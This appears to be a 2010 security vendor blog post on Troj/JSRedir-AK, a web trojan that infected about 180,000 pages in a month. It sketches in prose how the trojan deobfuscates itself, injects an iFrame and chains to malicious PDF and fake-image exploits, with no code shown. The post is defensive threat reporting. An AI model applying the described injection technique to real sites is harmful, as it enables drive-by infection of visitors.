Troj/JSRedir-AK: 40% of a month’s malware

It has been a month since we added detection for Troj/JSRedir-AK and figures generated today show that over 40% of all web-based detections have been from this malicious code.

[Graph shows malware hosted on websites from 2009-12-22 11:00:00 to 2010-01-21 11:00:00 (GMT-8)]

We saw 180,000 webpages that were infected with Troj/JSRedir-AK in the last 31 days. Translating that number into a more human comprehensible form means that we are seeing one new webpage infected with this malware every 15 seconds.

The affected sites include a host of well-known names, including ones from the following industry sectors:

  • Energy Companies
  • Retail Companies
  • Automobile Club
  • Hotels

In earlier posts (2) I talked a little about what Troj/JSRedir-AK does, and I will expand on that a little below.

Using the JavaScript .replace the malware deobfuscates itself and dynamically writes an iFrame in order to point to a Russian website on port 8080 which serves up scripts detected by Sophos as Troj/Iframe-DL.

This new script will write an iFrame that will attempt to load a malicious PDF (detected as Troj/PDFJs-FY) and a file claiming to be a JPG image (detected as Exp/VidCtl-A). These then will install various other malware onto your computer.

Troj/JSRedir-AK is a continuation of the Gumblar gang’s exploits using Russian domains instead of Chinese ones.

In fact, the graph above is very similar to the one we saw for Troj/JSRedir-R and the infection mechanisms seem to be the same (i.e. FTP credentials).